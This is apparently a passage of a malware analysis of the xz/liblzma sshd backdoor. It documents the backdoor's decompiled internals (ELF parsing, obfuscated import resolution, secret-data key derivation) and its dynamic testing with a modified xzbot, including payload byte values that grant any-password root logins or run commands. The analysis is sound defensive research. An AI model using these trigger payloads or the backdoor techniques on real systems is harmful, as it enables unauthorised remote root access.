45 00 c7 7f 6e 20 d3 2c 60 2b 2c 6d 31 00 ``` ## Dynamic analysis We now explore the backdoor's handling of a command by a presumed attacker from a dynamic perspective. For our experiments, we used a patched version of the library as suggested in the [xzbot](https://github.com/amlweems/xzbot) project. Below is an example of a fully encrypted payload being stored in RSA modulus value during a SSH connection by a potential attacker: ``` 00000000 01 00 00 00 01 00 00 00 01 00 00 00 00 00 00 00 |................| <- magic_header 00000010 ed f6 02 f5 5f 25 72 4a de 4f d0 0a 94 3f e2 71 |...._%rJ.O...?.q| <- encrypted data 00000020 bf f4 3b 12 80 1e 5d 81 89 e2 a3 83 de aa ea 2b |..;...]........+| 00000030 1e 79 b0 f9 f0 24 ca a4 db 70 83 6a 17 d4 77 f6 |.y...$...p.j..w.| 00000040 d5 29 98 a7 32 a1 c0 8c fd 81 26 1c ba 3a f0 8c |.)..2.....&..:..| 00000050 2d ab e3 c6 ad 6d f8 11 18 83 a6 23 bc ff a5 61 |-....m.....#...a| 00000060 1c f3 3a c0 78 40 cd 08 b2 0a b1 3c 62 5e 73 b5 |..:.x@.....ssh_logs_p; if ( !modulus ) return Error; if ( !ssh_logs ) return Error; func_mm_log_handler_ptr = ssh_logs->func_mm_log_handler_ptr; if ( !func_mm_log_handler_ptr ) return Error; mm_log_handler_hook_ptr = ssh_logs->mm_log_handler_hook_p; if ( !mm_log_handler_hook_ptr ) return Error; handle_logging = ssh_logs->handle_logging; if ( !handle_logging || !ssh_logs->mm_log_handler_checked ) return Error; flags0 = modulus->cmd_bytes.flags0; if ( (flags0 & F0_LOG_HANDLER_FLAG_1) != 0 && ctx->getuid_res ) return Success; mm_log_hander_hook = *mm_log_handler_hook_ptr; if ( *mm_log_handler_hook_ptr && mm_log_hander_hook >= ctx->sshd_code_start && mm_log_hander_hook < ctx->sshd_code_end ) { ssh_logs->func_mm_log_handler_ptr = mm_log_handler_hook_ptr; ssh_logs->mm_log_handler_hook_p = func_mm_log_handler_ptr; mm_log_handler_hook = mm_log_handler_hook_ptr; mm_log_handler_hook_ptr = func_mm_log_handler_ptr; func_mm_log_handler_ptr = mm_log_handler_hook; } mm_log_handler_hook_addr = *mm_log_handler_hook_ptr; ssh_logs->mm_log_hander_original = *func_mm_log_handler_ptr; ssh_logs->mm_log_hander_hook = mm_log_handler_hook_addr; if ( (flags0 & F0_LOG_HANDLER_FLAG_1) != 0 ) { if ( (flags0 & F0_LOG_HANDLER_FLAG_2) == 0 || ssh_logs->str__s_key_ptr && ssh_logs->str__connection_closed_by_ptr && ssh_logs->str_preauth_ptr ) { goto _exit; } return Error; } ssh_logs->used = 1; _exit: *func_mm_log_handler_ptr = handle_logging; return Success; } ``` To test the functionality of the backdoor, we used a modified `xzbot` project: ```go type xzSigner struct { signingKey ed448.PrivateKey encryptionKey []byte hostkey []byte cert *ssh.Certificate command int payload []byte } func (s *xzSigner) PublicKey() ssh.PublicKey { if s.cert != nil { return s.cert } magic1 := uint32(0x1234) magic2 := uint32(0x5678) magic3 := uint64(0xfffffffff9d9ffa1) if s.command == 0 { magic3 = uint64(0xfffffffff9d9ffa0) } else if s.command == 1 { magic3 = uint64(0xfffffffff9d9ffa1) } else if s.command == 2 { magic3 = uint64(0xfffffffff9d9ffa2) } else if s.command == 3 { magic3 = uint64(0xfffffffff9d9ffa3) } magic := uint32(uint64(magic1)*uint64(magic2) + magic3) ... } ``` The table below describes the command and payload values used to trigger interesting backdoor functionality: | command | payload | description | | ------- | -------------------------------------------------------------------- | ---------------------------------------------------------------------------------------------------------- | | `1` | `[]byte{0b00001001, 0b00001101, 0b00000000, 0b00000001, 0b00000000}` | allows subsequent connections to use any password to obtain an interactive session as an unprivileged user | | `1` | `[]byte{0b00001001, 0b00001100, 0b00000000, 0b00000001, 0b00000000}` | allows subsequent conntections to use any password to obtain an interactive session as the `root` user | | `2` | `[]byte{0x0, 0x0, 0x0, command_len, 0x0, command, 0x0}` | allows execution of a command using `system` | | `2` | `[]byte{0x0, 0b00000001, 0x0, command_len, 0x0, uid, command, 0x0 }` | allows execution of a command using `system` with a specific user ID | # Primitives In this part of our report, we document various primitives used by the backdoor that are glossed over in other sections. ## Strings The backdoor uses a radix tree (radix/prefix trie) [3] to store strings in memory. The `reverse_trie_lookup` function located at `.text.simple_coder_updata:000000000000A8B0` is responsible for obtaining a string ID for a given address. The tables used for decoding are located in the `.rodata.lzip_decode0` and `.rodata.crc64_clmul1` segments of the object file. The list of strings and a Python-based decoder can be found at the following links (thank you @q3k): - https://gist.github.com/q3k/af3d93b6a1f399de28fe194add452d01 - https://gist.github.com/q3k/3fadc5ce7b8001d550cf553cfdc09752 To simplify reverse engineering (string navigation), we have integrated the above [into IDA](./helpers/). ## ELF parsing During operation, the backdoor performs various functionalities such as restoring imports and checking memory regions. To do this, it has its own ELF parser and a custom structure to represent the ELF following parsing. This is documented below: ```c struct elf_info { Elf64_Ehdr *ehdr; ///< pointer to ELF structure uint64_t first_pt_load_vaddr; ///< smallest vaddr for PT_LOAD entry uint64_t program_headers; ///< program headers list uint32_t e_phnum; ///< program header count uint32_t reserved0; Elf64_Dyn *dynamic; ///< .dynamic start uint64_t dynamic_count; ///< number of elements in .dynamic uint64_t dynstr; ///< .dynstr start Elf64_Sym *dynsym; ///< .dynsym start Elf64_Rela *rela_plt; ///< .rela.plt start uint32_t rela_plt_count; ///< number of elements in .rela.plt uint32_t gnu_relro_found; ///< item with PT_GNU_RELRO is found uint64_t gnu_relro_vaddr; ///< vaddr for PT_GNU_RELRO program header uint64_t gnu_relro_memsz; ///< memsz for PT_GNU_RELRO program header Elf64_Verdef *verdef; ///< value for DT_VERDEF uint64_t verdefnum; ///< value for DT_VERDEFNUM Elf64_Versym *gnu_version; ///< value for DT_VERSYM Elf64_Rela *rela_dyn; ///< .rela.dyn start uint64_t rela_dyn_count; ///< number of elements in .rela.dyn Elf64_Rela *relr_relocs; ///< value for DT_PREINIT_ARRAY|DT_HASH uint32_t relr_relocs_count; ///< number of elements in program header with DT_EXTRANUM|DT_PREINIT_ARRAY uint32_t reserved1; uint64_t code_segment_start; uint64_t code_segment_size; uint64_t reserved2[2]; uint64_t file_end; uint64_t file_padding_size; uint64_t mem_padding_size; uint8_t custom_flags; ///< custom flags that depend on the flags in .dynamic uint8_t reserved3[7]; uint32_t gnuhash_nbuckets; ///< GNU hash table fields uint32_t gnuhash_bloom_size; uint32_t gnuhash_bloom_shift; uint32_t reserved4; uint64_t *gnuhash_bloom_start; uint32_t *gnuhash_buckets; uint32_t *gnuhash_chain; }; ``` The pseudocode for the parsing function is shown below: ```c Status __fastcall parse_elf(Elf64_Ehdr *ehdr, elf_info_t *elf_info) { // [COLLAPSED LOCAL DECLARATIONS. PRESS NUMPAD "+" TO EXPAND] if ( ehdr ) { if ( !elf_info ) return Error; size = 62; p_first_pt_load_vaddr = &elf_info->first_pt_load_vaddr; first_pt_load_vaddr = -1; phdr_index = 0; while ( size ) { *p_first_pt_load_vaddr = 0; p_first_pt_load_vaddr = (p_first_pt_load_vaddr + 4); --size; } elf_info->ehdr = ehdr; last_pt_dynamic_index = -1; e_phnum = ehdr->e_phnum; program_headers = &ehdr->e_ident[ehdr->e_phoff]; LOWORD(elf_info->e_phnum) = e_phnum; elf_info->program_headers = program_headers; phdr = program_headers; // process program headers while ( phdr_index < e_phnum ) { p_type = phdr->__p_type; if ( phdr->__p_type == PT_LOAD ) { if ( first_pt_load_vaddr > phdr->p_vaddr ) first_pt_load_vaddr = phdr->p_vaddr; } else if ( p_type == PT_DYNAMIC ) { last_pt_dynamic_index = phdr_index; } else if ( is_gnu_relro(p_type, 0xA0000000) ) { if ( elf_info->gnu_relro_found ) // error: more then 1 PT_GNU_RELRO segments found return Error; elf_info->gnu_relro_vaddr = phdr->p_vaddr; gnu_relro_memsz = phdr->p_memsz; elf_info->gnu_relro_found = 1; elf_info->gnu_relro_memsz = gnu_relro_memsz; } ++phdr_index; ++phdr; } if ( first_pt_load_vaddr == -1 ) return Error; if ( last_pt_dynamic_index == -1 ) return Error; elf_info->first_pt_load_vaddr = first_pt_load_vaddr; pt_dynamic = &program_headers[last_pt_dynamic_index]; pt_dynamic_memsz = pt_dynamic->p_memsz; dynamic = &ehdr->e_ident[pt_dynamic->p_vaddr - first_pt_load_vaddr]; elf_info->dynamic = dynamic; LODWORD(elf_info->dynamic_count) = pt_dynamic_memsz >> 4; pt_dynamic_num_of_entries = pt_dynamic_memsz >> 4; if ( validate_memory_range(elf_info, dynamic, pt_dynamic_memsz, PF_R) == Error ) return Error; d_val_addr = &dynamic->d_un; verdefnum_found = 0; dt_extranum_dt_preinit_array_value = -1; d_relasz_value = -1; d_pltrelsz_value = -1; dt_gnuhash_value = 0; for ( i = 0; pt_dynamic_num_of_entries != i; ++i ) { dyn_item.d_tag = *(d_val_addr - 1); if ( !dyn_item.d_tag ) { LODWORD(elf_info->dynamic_count) = i; break; } if ( dyn_item.d_tag <= 0x24 ) { if ( dyn_item.d_tag > 0x16 ) { switch ( dyn_item.d_tag ) { case DT_JMPREL: elf_info->rela_plt = *d_val_addr; break; case DT_BIND_NOW: goto _label1; case DT_FLAGS: is_not_df_bind_now = (*d_val_addr & DF_BIND_NOW) == 0; goto _label2; case DT_EXTRANUM|DT_PREINIT_ARRAY: dt_extranum_dt_preinit_array_value = *d_val_addr; break; case DT_PREINIT_ARRAY|DT_HASH: elf_info->relr_relocs = *d_val_addr; break; default: break; } } else { switch ( dyn_item.d_tag ) { case DT_PLTRELSZ: d_pltrelsz_value = *d_val_addr; break; case DT_STRTAB: elf_info->dynstr = *d_val_addr; break; case DT_SYMTAB: elf_info->dynsym = *d_val_addr; break; case DT_RELA: elf_info->rela_dyn = *d_val_addr; break; case DT_RELASZ: d_relasz_value = *d_val_addr; break; default: break; } } } else if ( dyn_item.d_tag == DT_FLAGS_1 ) { is_not_df_bind_now = (*d_val_addr & DF_1_NOW) == 0; _label2: if ( !is_not_df_bind_now ) _label1: elf_info->custom_flags |= 0x20; } else if ( dyn_item.d_tag > DT_FLAGS_1 ) { switch ( dyn_item.d_tag ) { case DT_VERDEFNUM: verdefnum_found = 1; elf_info->verdefnum = *d_val_addr; break; case DT_HIPROC: return Error; case DT_VERDEF: elf_info->verdef = *d_val_addr; break; } } else if ( dyn_item.d_tag > DT_AUDIT ) { if ( dyn_item.d_tag == DT_VERSYM ) { dt_versym_value = *d_val_addr; elf_info->custom_flags |= 0x10; elf_info->gnu_version = dt_versym_value; } } else { if ( dyn_item.d_tag > DT_CONFIG ) return Error; if ( dyn_item.d_tag == DT_GNU_HASH ) dt_gnuhash_value = *d_val_addr; } d_val_addr += 2; } rela_plt = elf_info->rela_plt; if ( rela_plt ) { if ( d_pltrelsz_value == -1 ) return Error; elf_info->custom_flags |= 1; elf_info->rela_plt_count = d_pltrelsz_value / 0x18; } rela_dyn = elf_info->rela_dyn; if ( rela_dyn ) { if ( d_relasz_value == -1 ) return Error; elf_info->custom_flags |= 2; LODWORD(elf_info->rela_dyn_count) = d_relasz_value / 24; } relr_relocs = elf_info->relr_relocs; if ( relr_relocs ) { if ( dt_extranum_dt_preinit_array_value == -1 ) return Error; elf_info->custom_flags |= 4; elf_info->relr_relocs_count = dt_extranum_dt_preinit_array_value >> 3; } if ( elf_info->verdef ) { if ( verdefnum_found ) elf_info->custom_flags |= 8; else elf_info->verdef = 0; } dynstr_ptr = elf_info->dynstr; if ( dynstr_ptr ) { dynsym = elf_info->dynsym; if ( dt_gnuhash_value ) { if ( dynsym ) { if ( ehdr >= dynstr_ptr ) { elf_info->dynstr = &ehdr->e_ident[dynstr_ptr]; elf_info->dynsym = (dynsym + ehdr); if ( rela_plt ) elf_info->rela_plt = (rela_plt + ehdr); if ( rela_dyn ) elf_info->rela_dyn = (rela_dyn + ehdr); if ( relr_relocs ) elf_info->relr_relocs = (relr_relocs + ehdr); gnu_version = elf_info->gnu_version; if ( gnu_version ) elf_info->gnu_version = (gnu_version + ehdr); dt_gnuhash_value = (dt_gnuhash_value + ehdr); } verdef = elf_info->verdef; if ( verdef && verdef < ehdr ) elf_info->verdef = &ehdr->e_ident[verdef]; if ( !elf_info->rela_plt || validate_memory_range(elf_info, elf_info->rela_plt, d_pltrelsz_value, PF_R) ) { v35 = elf_info->rela_dyn; if ( !v35 || validate_memory_range(elf_info, v35, d_relasz_value, PF_R) ) { v36 = elf_info->relr_relocs; if ( !v36 || validate_memory_range(elf_info, v36, dt_extranum_dt_preinit_array_value, 4) ) { v37 = elf_info->verdef; if ( !v37 || validate_memory_range(elf_info, v37, 20 * elf_info->verdefnum, PF_R) ) { // https://flapenguin.me/elf-dt-gnu-hash nbuckets = dt_gnuhash_value->nbuckets; elf_info->gnuhash_nbuckets = nbuckets; bloom_size = dt_gnuhash_value->bloom_size; symoffset = dt_gnuhash_value->symoffset; elf_info->gnuhash_bloom_size = bloom_size - 1; bloom_shift = dt_gnuhash_value->bloom_shift; elf_info->gnuhash_bloom_start = &dt_gnuhash_value->bloom_start; buckets_start = (&dt_gnuhash_value->bloom_start + bloom_size); elf_info->gnuhash_bloom_shift = bloom_shift; elf_info->gnuhash_buckets = buckets_start; elf_info->gnuhash_chain = &buckets_start[nbuckets - symoffset]; return Success; } } } } } } } return Error; } return Error; } ``` This information is used, for example, in the `import_lookup` function (where the `Elf64_Sym *result` is obtained by traversing the GNU Hash ELF section). ```c Elf64_Sym *__fastcall import_lookup(elf_info_t *elf_info, int import_sid, int lib_sid) { // [COLLAPSED LOCAL DECLARATIONS. PRESS NUMPAD "+" TO EXPAND] if ( secret_data_update_for_ret(0x58u, 0xFu, 3u, 0) && (!lib_sid || (elf_info->custom_flags & 0x18) == 0x18) ) { current_bucket = 0; _next: if ( current_bucket < elf_info->gnuhash_nbuckets ) { bucket = &elf_info->gnuhash_buckets[current_bucket]; if ( validate_memory_range(elf_info, bucket, 4uLL, PF_R) ) { v15 = &elf_info->gnuhash_chain[*bucket]; if ( validate_memory_range(elf_info, v15, 8uLL, PF_R) ) { while ( 1 ) { item = ((v15 - elf_info->gnuhash_chain) >> 2); sym = &elf_info->dynsym[item]; if ( validate_memory_range(elf_info, sym, 0x18uLL, PF_R) == Error ) break; if ( sym->st_value && sym->st_shndx ) { name = (elf_info->dynstr + sym->st_name); if ( validate_memory_range(elf_info, name, 1uLL, PF_R) == Error ) return 0LL; if ( reverse_trie_lookup(name, 0LL) == import_sid ) { if ( !lib_sid ) return sym; v8 = &elf_info->gnu_version[item]; if ( validate_memory_range(elf_info, v8, 2uLL, PF_R) == Error ) return 0LL; v9 = *v8; if ( (elf_info->custom_flags & 0x18) == 24 && (v9 & 0x7FFE) != 0 ) { verdef = elf_info->verdef; vd_ndx = v9 & 0x7FFF; for ( i = 0; i < elf_info->verdefnum && validate_memory_range(elf_info, verdef, 0x14uLL, PF_R) && verdef->vd_version == 1; ++i ) { if ( vd_ndx == verdef->vd_ndx ) { v12 = verdef + verdef->vd_aux; if ( validate_memory_range(elf_info, v12, 8uLL, PF_R) == Error ) break; v13 = (elf_info->dynstr + *v12); if ( validate_memory_range(elf_info, v13, 1uLL, PF_R) == Error ) break; if ( lib_sid == reverse_trie_lookup(v13, 0LL) ) return sym; } vd_next = verdef->vd_next; if ( !vd_next ) break; verdef = (verdef + vd_next); } } } } v15 += 4; if ( (*(v15 - 4) & 1) != 0 ) { ++current_bucket; goto _next; } } } } } } return 0LL; } ``` ## Import resolution via lzma allocator In order to obfuscate function calls that perform import resolution, the backdoor abuses the `liblzma` allocator API. The `lzma` allocator allows one to specify custom functions to perform allocation and destruction via the following structure: ```c typedef struct { void *(LZMA_API_CALL *alloc)(void *opaque, size_t nmemb, size_t size); void (LZMA_API_CALL *free)(void *opaque, void *ptr); void *opaque; } lzma_allocator; ``` The backdoor uses `get_lzma_allocator`, to obtain a pointer to `g_fake_lzma_allocator`, which contains the backdoor's custom "allocator". The pseudocode of `get_lzma_allocator` function is shown below: ```c lzma_allocator *__fastcall get_lzma_allocator() { return (get_lzma_allocator_addr() + 8); } uint8_t *__fastcall get_lzma_allocator_addr() { int i; // [rsp+1Ch] [rbp-Ch] uint8_t *addr; // [rsp+20h] [rbp-8h] addr = g_fake_lzma_allocator_s180h_addr; for ( i = 0; i <= 11; ++i ) addr += 32; return addr; } ``` This function will return `lzma_allocator `: ``` .data.rel.ro.lookup_filter.part.0:000000000000CAE8 g_fake_lzma_allocator_s180h_addr dq offset g_fake_lzma_allocator-180h ... .data.rel.ro.decoders0:000000000000CAF0 g_fake_lzma_allocator dq 22h .data.rel.ro.decoders0:000000000000CAF8 ; lzma_allocator .data.rel.ro.decoders0:000000000000CAF8 lzma_allocator ``` The backdoor populates `alloc`, `free` and `opaque` with the following values: - `alloc`: `import_lookup_st_value` - `free`: `bd_lzma_free` (this function does nothing in the backdoor code) - `opaque`: `decode_insns` Thus, a call to `lzma_alloc(value, lzma_allocator)`, will result in a call to `import_lookup_st_value` with arguments (`opaque`, `nmemb`, `value`), where pseudocode of `import_lookup_st_value` is shown below: ```c Elf64_Sym *__fastcall import_lookup_st_value(elf_info_t *elf_info, size_t nmemb, int import_sid) { return import_lookup_st_value(elf_info, import_sid); } Elf64_Sym *__fastcall import_lookup_ex(elf_info_t *elf_info, int import_sid) { Elf64_Sym *sym; // rax Elf64_Addr st_value; // rdx sym = import_lookup(elf_info, import_sid, 0); if ( sym ) { st_value = sym->st_value; if ( st_value && sym->st_shndx ) return (st_value + elf_info->ehdr); else return 0LL; } return sym; } ``` When `opaque` is set to `elf_info* elf_info`, and `size` is set to string identifier, `lzma_alloc` will return the address of the imported function. Examples of use: ```c // .text.lzma_index_buffer_encoda:00000000000045D0 Status __fastcall resolve_read_and_errno_location(Elf64_Ehdr **p_elf, elf_info_t *elf_info, imports_struct *imports) { lzma_allocator *lzma_allocator; // r13 Status result; // eax uint64_t read; // rax uint64_t import; // rax lzma_allocator = get_lzma_allocator(); result = parse_elf(*p_elf, elf_info); if ( result ) { lzma_allocator->opaque = elf_info; read = lzma_alloc(STR_read_, lzma_allocator); imports->read = read; if ( read ) ++imports->count; import = lzma_alloc(STR___errno_location_, lzma_allocator); imports->__errno_location = import; if ( import ) ++imports->count; return imports->count == 2; } return result; } ``` ```c // .text.lzma_lz_encoder_memusaga:0000000000002540 Status __fastcall resolve_imports(uint64_t *dst_addr, elf_info_t *elf_info, elf_info_t *einfo, hfuncs_t *crypto_funcs) { // [COLLAPSED LOCAL DECLARATIONS. PRESS NUMPAD "+" TO EXPAND] size = 0LL; lzma_allocator = get_lzma_allocator(); lzma_allocator->opaque = einfo; allocator = lzma_allocator; base = get_code_start_and_size(elf_info, &size); if ( base ) { start = base; end = base + size; EVP_PKEY_new_raw_public_key = lzma_alloc(STR_EVP_PKEY_new_raw_public_key_, allocator); ... lzma_free(crypto_funcs->EVP_PKEY_new_raw_public_key, allocator, insn_size); } return Error; } ``` ## Memory validation The backdoor uses the `validate_memory_range` function to check the validity of memory ranges. We see its use in `import_lookup` with the use of the `PF_R` flag, for example, to check for permission to read. ```c Status __fastcall validate_memory_range(elf_info_t *elf_info, uint8_t *address, size_t size, uint32_t p_flags) { return validate_memory_range_with_depth(elf_info, address, size, p_flags, 0LL); } Status __fastcall validate_memory_range_with_depth( elf_info_t *elf_info, uint8_t *addr, size_t size, uint32_t p_flags, uint64_t depth) { // [COLLAPSED LOCAL DECLARATIONS. PRESS NUMPAD "+" TO EXPAND] ehdr = elf_info->ehdr; _start: depth = (depth + 1); end = &addr[size]; if ( !size ) return Success; current = &addr[size]; if ( addr <= end ) current = addr; if ( current >= ehdr && depth != 0x3EA ) { for ( i = 0LL; i < LOWORD(elf_info->e_phnum); ++i ) { phdr = (elf_info->program_headers + 56 * i); if ( phdr->__p_type == PT_LOAD && (p_flags & phdr->p_flags) == p_flags ) { v12 = &ehdr->e_ident[phdr->p_vaddr - elf_info->first_pt_load_vaddr]; v13 = v12 + phdr->p_memsz; v14 = v12 & 0xFFFFFFFFFFFFF000LL; if ( (v13 & 0xFFF) != 0 ) v13 = (v13 & 0xFFFFFFFFFFFFF000LL) + 0x1000; if ( addr >= v14 && v13 >= end ) return Success; if ( v13 < end || addr >= v14 ) { if ( addr >= v13 || addr < v14 ) { if ( v13 < end && addr < v14 ) { depth0 = depth; result = validate_memory_range_with_depth(elf_info, addr, v14 - addr, p_flags, depth); if ( result ) return validate_memory_range_with_depth(elf_info, (v13 + 1), &end[-v13 - 1], p_flags, depth0) != Error; return result; } } else if ( v13 < end ) { addr = (v13 + 1); size = &end[-v13 - 1]; goto _start; } } else if ( v14 < end ) { size = v14 - addr - 1; goto _start; } } } } return Error; } ``` The backdoor also uses `pselect` to check if a given range is mapped: ```c Status __fastcall is_mapped_range(uint8_t *addr, size_t size, all_t *api_ctx) { const sigset_t *sigmask; // rbx standard_funcs_t *standard; // rax int (__fastcall *pselect)(int, fd_set *, fd_set *, fd_set *, const struct timespec *, const sigset_t *); // rax void **errno; // rax timespec timeout; // [rsp+0h] [rbp-38h] BYREF if ( !size ) return 0; if ( addr <= 0xFFFFFF ) return Error; sigmask = (addr & 0xFFFFFFFFFFFFF000LL); if ( (addr & 0xFFFFFFFFFFFFF000LL) < &addr[size] ) { timeout.tv_sec = 0LL; if ( api_ctx ) { while ( 1 ) { standard = api_ctx->standard; if ( !standard ) break; if ( !standard->__errno_location ) break; pselect = standard->pselect; if ( !pselect ) break; timeout.tv_nsec = 1LL; if ( pselect(1, 0LL, 0LL, 0LL, &timeout, sigmask) < 0 ) { errno = (api_ctx->standard->__errno_location)(1LL); if ( *errno == EFAULT || !sigmask ) { *errno = 0; return Error; } } sigmask += 1024; if ( sigmask >= &addr[size] ) return Success; timeout.tv_sec = 0LL; } } return Error; } return Success; } ``` ## Disassembler To search for specific addresses, instructions, string references, the backdoor implements a simplified x86 disassembler. The function performing disassembly can be found at `.text.x86_codd:0000000000000010` in analysed object file: ```c Status decode_insns(insn_t *insn, uint8_t *start_ea, uint8_t *end_ea); ``` The partially reconstructed `insn_t` structure is documented in [4]. Note that the `xzre` project allows us to test disassembler on an arbitrary data ([5]). An example of the backdoor using its disassembler is shown below: ```c Status __fastcall find_lea_displ(uint8_t *start_ea, uint8_t *end_ea, insn_t *insn, uint64_t lea_displ) { uint32_t *insn_p; // rdi size_t i; // rcx insn_t insna; // [rsp+8h] [rbp-80h] BYREF if ( secret_data_update_for_ret(0x1C8u, 0, 0x1Eu, 0) ) { insn_p = &insna; for ( i = 22LL; i; --i ) *insn_p++ = 0; if ( !insn ) insn = &insna; while ( start_ea < end_ea ) { if ( decode_insns(insn, start_ea, end_ea) && insn->opcode == INSN_LEA0 && (insn->rex_b & 0x48) == 0x48 && (*&insn->mod_rm & 0xFF00FF00) == 0x5000000 && (!lea_displ || insn->mem_displ + insn->addr + insn->insn_size == lea_displ) ) { return 1; } ++start_ea; } } return Error; } ``` ## Secret data To obtain the ED448 public key used in main hook function, the backdoor relies on `ctx->secret_data`: ```c Status __fastcall decrypt_secret_data(uint8_t *out, global_ctx *ctx) { hfuncs_t *hfuncs; // r9 size_t i; // rcx uint32_t *dptr1; // rdi size_t j; // rcx uint32_t *dptr2; // rdi uint8_t key1[32]; // [rsp-20h] [rbp-B8h] BYREF uint8_t iv1[16]; // [rsp+0h] [rbp-98h] BYREF uint8_t key2[32]; // [rsp+10h] [rbp-88h] BYREF uint8_t iv2[16]; // [rsp+30h] [rbp-68h] BYREF if ( !out ) return 0; if ( ctx ) { hfuncs = ctx->hfuncs; if ( hfuncs ) { i = 0xCLL; dptr1 = key1; while ( i ) { *dptr1++ = 0; --i; } j = 0x1CLL; dptr2 = key2; while ( j ) { *dptr2++ = 0; --j; } if ( chacha20_decrypt(key1, 0x30uLL, key1, iv1, key2, hfuncs) ) return chacha20_decrypt(ctx->secret_data, 0x39uLL, key2, iv2, out, ctx->hfuncs) != Error; } } return Error; } Status __fastcall hook_main(RSA *r, global_ctx *ctx, uint32_t *status) { ... // check that ctx->secret_data will have the expected value if ( ctx->reg2reg_insn_count == 0x1C8 ) { header_value = modulus.magic_params; // decrypt g_ctx->secret_data to get ed448_public_key if ( decrypt_ed448_public_key(ed448_public_key, ctx) ) { // decrypt ciphertext using ed448_public_key[:32] as a key // and a, b, c as an IV if ( chacha20_decrypt( modulus.ciphertext.signature, n_bytes_count - 16, ed448_public_key, &header_value, modulus.ciphertext.signature, ctx->hfuncs) ) ... } ... } ... } ... ``` `ctx->secret_data` is a byte array of size `0x39` (57); its content is dependent on the backdoor's code. Below are some of the functions that relate to this field: ```c Status __fastcall secret_data_update( uint8_t *value, uint8_t *address, uint32_t shift_cursor, uint32_t reg2reg_insn_count, uint32_t operation_index) { global_ctx *ctx; // rax uint8_t *call_site; // [rsp+8h] [rbp-30h] BYREF call_site = 0LL; ctx = g_ctx; if ( g_ctx && !g_ctx->shift_operations[operation_index] ) { g_ctx->shift_operations[operation_index] = 1; if ( search_func_start_with(address, &call_site, 0LL, ctx->liblzma_code_start, ctx->liblzma_code_end, FIND_NOP) == Error || secret_data_update_with_check( call_site, g_ctx->liblzma_code_end, shift_cursor, reg2reg_insn_count, value == 0LL) == Error ) { return Error; } g_ctx->reg2reg_insn_count += reg2reg_insn_count; } return Success; } Status __fastcall secret_data_update_with_check( uint8_t *start_ea, uint8_t *end_ea, uint32_t shift_cursor, uint32_t reg2reg_insn_count, uint32_t update_ea) { __int64 sz; // rcx uint32_t *insn_p; // rdi size_t insn_count; // r12 uint32_t cursor; // [rsp+Ch] [rbp-9Ch] BYREF insn_t insn; // [rsp+18h] [rbp-90h] BYREF sz = 22LL; insn_p = &insn; while ( sz ) { *insn_p++ = 0; --sz; } cursor = shift_cursor; if ( update_ea ) { if ( !get_call_target(start_ea, end_ea, 0LL, &insn) ) return 0; start_ea = (insn.addr + insn.insn_size); } insn_count = 0LL; while ( find_reg2reg_insn(start_ea, end_ea, &insn) ) { if ( insn_count == reg2reg_insn_count ) { if ( reg2reg_insn_count < insn_count ) return 0; return reg2reg_insn_count == insn_count; } ++insn_count; if ( secret_data_update_with_cursor(&insn, &cursor) == Error ) return 0; start_ea = (insn.addr + insn.insn_size); } return reg2reg_insn_count == insn_count; } Status __fastcall secret_data_update_with_cursor(insn_t *insn, uint32_t *cursor) { uint32_t index; // eax InsnOpcodes opcode; // ecx uint32_t opcode_value; // ecx index = *cursor; if ( *cursor <= 0x1C7 ) { opcode = insn->opcode; if ( opcode != INSN_MOV0 && opcode != INSN_CMP0 ) { opcode_value = opcode - 0x83; if ( opcode_value > 0x2E || ((0x410100000101uLL >> opcode_value) & 1) == 0 ) // g_ctx->secret_data[index.byte_index] |= 1 << index.bit_index g_ctx->secret_data[index >> 3] |= 1 << (index & 7); } *cursor = index + 1; } return Success; } ``` The `secret_data_update` function is called many times during the backdoor's initialisation process. Note that if the backdoor's code is changed, `ctx->secret_data` (and hence the ED448 public key) will likely no longer the same, and the backdoor will cease to function correctly with this key. Clearly, the threat actors responsible intended to use different keys for different versions of the backdoor. ## Strings references During the initialisation routine, the backdoor is stores 27 instances of `string_ref_t`: ```c struct string_refs_t { string_ref_t refs[27]; }; struct string_ref_t { BackdoorStrings sid; uint32_t reserved; uint8_t *code_start; uint8_t *code_end; uint8_t *xref; }; ``` The index to `BackdoorStrings` map is shown below: ```c enum IndexToSid { I2S_xcalloc__zero_size_ = 0x0, I2S_Could_not_chdir_to_home_directory__s___s__ = 0x1, I2S_list_hostkey_types_ = 0x2, I2S_demote_sensitive_data_ = 0x3, I2S_mm_terminate_ = 0x4, I2S_mm_pty_allocate_ = 0x5, I2S_mm_do_pam_account_ = 0x6, I2S_mm_session_pty_cleanup2_ = 0x7, I2S_mm_getpwnamallow_ = 0x8, I2S_mm_sshpam_init_ctx_ = 0x9, I2S_mm_sshpam_query_ = 0xA, I2S_mm_sshpam_respond_ = 0xB, I2S_mm_sshpam_free_ctx_ = 0xC, I2S_mm_choose_dh_ = 0xD, I2S_sshpam_respond_ = 0xE, I2S_sshpam_auth_passwd_ = 0xF, I2S_sshpam_query_ = 0x10, I2S_start_pam_ = 0x11, I2S_mm_request_send_ = 0x12, I2S_mm_log_handler_ = 0x13, I2S_Could_not_get_agent_socket_ = 0x14, I2S_auth_root_allowed_ = 0x15, I2S_mm_answer_authpassword_ = 0x16, I2S_mm_answer_keyallowed_ = 0x17, I2S_mm_answer_keyverify_ = 0x18, I2S___48s___48s____d__pid__ld__ = 0x19, I2S_Unrecognized_internal_syslog_level_code__d__ = 0x1A, }; ``` These entries are used to identify the start and end of the functions mapped from specific strings: ```c sshlogv_func_start = string_refs.refs[I2S___48s___48s____d__pid__ld__].code_start; if ( string_refs.refs[I2S___48s___48s____d__pid__ld__].code_start ) { if ( !all->g_ctx.sshd_main_verified || is_endbr64( string_refs.refs[I2S___48s___48s____d__pid__ld__].code_start, (string_refs.refs[I2S___48s___48s____d__pid__ld__].code_start + 4), 0xE230) ) { counter = 22; ssh_logs->func_sshlogv = sshlogv_func_start; p_insn = &insn; while ( counter ) { *p_insn++ = 0; --counter; } ... } ... } ``` # Additional References - https://gist.github.com/smx-smx/a6112d54777845d389bd7126d6e9f504 - https://github.com/amlweems/xzbot - https://github.com/smx-smx/xzre - https://twitter.com/bl4sty/status/1776691497506623562 - https://github.com/blasty/JiaTansSSHAgent [1]: https://gynvael.coldwind.pl/?lang=en&id=782 [2]: https://gist.github.com/q3k/af3d93b6a1f399de28fe194add452d01 [3]: https://en.wikipedia.org/wiki/Radix_tree [4]: https://github.com/smx-smx/xzre/blob/main/xzre.h [5]: https://github.com/smx-smx/xzre/blob/ff3ba18a39bad272ff628bb759ed5c897cf441b3/xzre.c#L48 --ikeVEW9yuYc//A+q--